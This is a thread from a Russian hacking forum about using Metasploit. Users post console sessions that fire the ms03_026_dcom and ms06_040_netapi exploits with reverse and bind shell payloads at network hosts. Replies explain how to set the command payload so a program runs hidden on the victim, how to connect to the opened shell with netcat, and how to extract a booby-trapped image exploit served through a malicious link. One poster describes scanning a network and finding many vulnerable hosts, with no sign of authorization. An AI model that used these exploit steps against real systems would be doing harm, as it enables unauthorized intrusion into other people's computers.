Авторские статьи Metasploit Framework для ламеров

Discussion in 'Статьи' started by -=lebed=-, 11 Jul 2006.

?
  1. Да, пользуюсь и доволен.

    51.2%
  2. Нет, он меня не устраивает, не нужен и т. п.

    14.8%
  3. А что это?

    34.0%
  1. Ksif

    Ksif New Member

    Joined:
    12 Dec 2007
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Нет, стоит стандартный просмоторщик.
    Просто странно, что у всех wmf загружает, а у меня tiff. Может просто win32_reverse глючный?
    Вот чё у меня выходит:
    Screen
     
    #101 Ksif, 14 Dec 2007
    Last edited: 14 Dec 2007
  2. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Всё правильно, загружается tiff файл, (можно изменить расширение на любое графиских форматов jpg, bmp, wmf - файл-картинка с начинкой и сплоитом так же будет работать). Скорее всего сплоит не срабатывает, так как у тебя установлен Qicktime и картинки обрабатываются уже не системной dll (хотя и открытие происходит в просмотрщике факсов) поэтому сплоит и не срабатывает...
     
  3. Ksif

    Ksif New Member

    Joined:
    12 Dec 2007
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Теперь ясно, спасибо.
    Теперь, если можно, общий вопросик:
    1) Как подобрать шелл-код (PAYLOAD) под эксплойт?
    2) Допусти скачал я код эксплойта и PAYLOAD'a, как теперь скомпилировать его под pm формат?


    pm - это почти Перл, т.е интерпретируемый формат, он не компилируется...
    Начинки можно генерировать в Web-интерфейсе.

    И вообще пора юзать версию 3.0 (там решён 1 вопрос) и сплоиты на Руби. -=lebed=-
     
    #103 Ksif, 14 Dec 2007
    Last edited by a moderator: 14 Dec 2007
  4. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    Как сохранить созданный сплоит, чтобы можно было его без метасплоита запускать?
     
  5. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Открыть исходный код, например Оперой (самому зайти по вредоносной ссылке), сохранить как html, взять из кэша браузера сплоит (tiff-файл) и рядом сохранить, отредактировать в html путь к файлу со сплоитом.
    Во второй части всё есть, читай тут:https://forum.antichat.ru/showthread.php?t=21686
     
    1 person likes this.
  6. Conquerstador

    Conquerstador Banned

    Joined:
    7 Jul 2007
    Messages:
    124
    Likes Received:
    39
    Reputations:
    -6
    слушайте скачал мету 3.0 а где там загрузочный файл я там не могу найти как запустить в 2.7 там прям в файле а здесь нету помогите скачал с офф сайта...
     
  7. Amoura

    Amoura Elder - Старейшина

    Joined:
    23 Jan 2008
    Messages:
    237
    Likes Received:
    148
    Reputations:
    46
    Такой вот вопрос, в версии 2.7 нет команды "ls ------------- List the current directory (Показать файлы в текущей директории)"

    как тогда просматривать текущую деректорию?

    Набери help в консоли - должна быть ls и в 2.7
    -=lebed=-
     
    #107 Amoura, 23 Jan 2008
    Last edited by a moderator: 23 Jan 2008
  8. ticoll

    ticoll Banned

    Joined:
    14 Feb 2007
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Выложите плиз мануал по установке metasploit 3 на FREEBSD, скачал и незнаю как его собрать.
    В портах к сожелению устаревшая версия 2.7
    Тут http://framework.metasploit.com/msf/support - маны по установке посмотри -=lebed=-
    Там смотрел, нема.
     
    #108 ticoll, 4 Feb 2008
    Last edited: 4 Feb 2008
  9. romasjan

    romasjan New Member

    Joined:
    6 Feb 2008
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    блин чет не выходит ! нашел уязвимость на 135 порту нашел експлоит

    msf > use windows/dcerpc/ms03_026_dcom
    msf exploit(ms03_026_dcom) > set PAYLOAD windows/exec/reverse_tcp
    PAYLOAD => windows/exec/reverse_tcp
    msf exploit(ms03_026_dcom) > set RHOST 192.168.191.105
    RHOST => 192.168.191.105
    msf exploit(ms03_026_dcom) > set LHOST 192.168.191.172
    LHOST => 192.168.191.172
    msf exploit(ms03_026_dcom) > show options

    Module options:

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    RHOST 192.168.191.105 yes The target address
    RPORT 135 yes The target port


    Payload options:

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    CMD yes The command string to execute
    EXITFUNC thread yes Exit technique: seh, thread, process
    LHOST 192.168.191.172 yes The local address
    LPORT 4444 yes The local port


    Exploit target:

    Id Name
    -- ----
    0 Windows NT SP3-6a/2000/XP/2003 Universal


    msf exploit(ms03_026_dcom) > exploit
    [-] Exploit failed: The following options failed to validate: CMD.

    вроди везде да а в итоге СМД нифига!
    че мне там еще прописывать!??????
     
  10. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    У тебя не задан параметр CMD
     
  11. diehard

    diehard Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    442
    Likes Received:
    266
    Reputations:
    15
    На сайте http://metasploit.com/ доступна версия 3.1, она запускается из-под Ruby http://rubyforge.org/ У кого-то работает? У меня не запускается, Ruby установлен, но опыта работы с ним нету.
     
  12. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    У меня всё работает! там также как в 3.0 есть работа через веб даже скины можно поменять :D и через консоль заходиш в Metasploit 3 GUI там во вкладке Window Console(Crtl+O);
     
    1 person likes this.
  13. Amoura

    Amoura Elder - Старейшина

    Joined:
    23 Jan 2008
    Messages:
    237
    Likes Received:
    148
    Reputations:
    46
    Вот все что нашел по этому поводу metasploit-3-on-freebsdl
     
  14. romasjan

    romasjan New Member

    Joined:
    6 Feb 2008
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Sleep Я понимаю что параметр СMD не задан но как его задать и какие команды прописывать
     
  15. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    set CMD regedit.exe например запустится редактор рестра в скрытом виде
     
  16. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    вобще тут где вроде есть в статье от -=lebed=- про ету начинку точно не знаю
     
  17. romasjan

    romasjan New Member

    Joined:
    6 Feb 2008
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    незнаю у лебедя вроди нет, но если знаешь где есть поделись адреском буду благодарен! и где можно нарыть какие нибудь инструкции про другие начинки не только к этому сплойту
     
  18. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Вижу назрела необходимость "разжевать" версию 3.1... как руки дойдут, постараюсь, а может это уже сдеалает кто-то другой?
    ЗЫ смд - это параметр начинки шелла, т.е комманда которая должна выполниться при захвате управления...
     
  19. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    https://forum.antichat.ru/thread32452.html
    https://forum.antichat.ru/thread38434.html
    https://forum.antichat.ru/thread21686.html
    Вот в этих статьях описанны почти все начинки
    Ну далеко не все и скорее типы начинок чем они сами... ;) прим. -=lebed=-
     
    #119 Sleep, 7 Feb 2008
    Last edited by a moderator: 7 Feb 2008
  20. romasjan

    romasjan New Member

    Joined:
    6 Feb 2008
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    сканирую сеть на 445 порту весит эта уязвимость причем у каждого второго ms06-040,
    запускаю сплойт привинчиваю (generic/shell_bind_tcp) ну ввожу LHOST i RHOST запускаю и получаю:
    msf exploit(ms06_040_netapi) > exploit
    [*] Started bind handler
    [*] Detected a Windows XP SP0/SP1 target
    [*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.191.81[\BROWSER] ...
    [*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.191.81[\BROWSER] ...
    [*] Building the stub data...
    [*] Calling the vulnerable function...
    че мне теперь делать не могу понять

    Ответ:
    У тебя начинка shell_bind_tcp - биндит порт на удалённой машине, теперь логично пробовать к нему подключаться неткатом... (nc host port)
     
    #120 romasjan, 7 Feb 2008
    Last edited by a moderator: 7 Feb 2008